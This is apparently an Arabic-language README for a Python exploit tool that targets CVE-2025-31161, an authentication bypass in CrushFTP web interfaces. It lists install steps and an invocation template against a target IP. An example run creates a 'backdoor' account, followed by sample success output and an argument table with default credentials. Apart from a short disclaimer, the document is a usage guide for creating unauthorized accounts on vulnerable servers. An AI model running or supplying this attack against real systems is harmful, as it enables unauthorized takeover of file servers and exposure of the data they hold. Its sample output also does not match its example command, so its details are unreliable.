
🛡️ CVE-2025-31161 - استغلال تجاوز المصادقة لإنشاء المستخدمين في CrushFTP

تستهدف أداة استغلال Python هذه خوادم CrushFTP المعرضة لـ CVE-2025-31161. تسمح الثغرة بإنشاء حساب مستخدم دون مصادقة عن طريق إرسال حمولة XML مصممة إلى واجهة الويب، مما قد يؤدي إلى اختراق كامل للخادم.
هذه الأداة مخصصة للاختبارات الأمنية التعليمية والمصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (مع Homebrew):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: AuthBypassAccount
[*] Password: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
| الوسيطة | الوصف | القيمة الافتراضية |
|---|
--target_host | (مطلوب) IP أو نطاق الهدف | — |
--port | منفذ واجهة الويب CrushFTP | 8080 |
--target_user | اسم مستخدم المسؤول (يستخدم في الحمولة) | crushadmin |
--new_user | اسم المستخدم للحساب الجديد غير المصرح به | AuthBypassAccount |
--password | كلمة المرور للمستخدم الجديد | CorrectHorseBatteryStaple |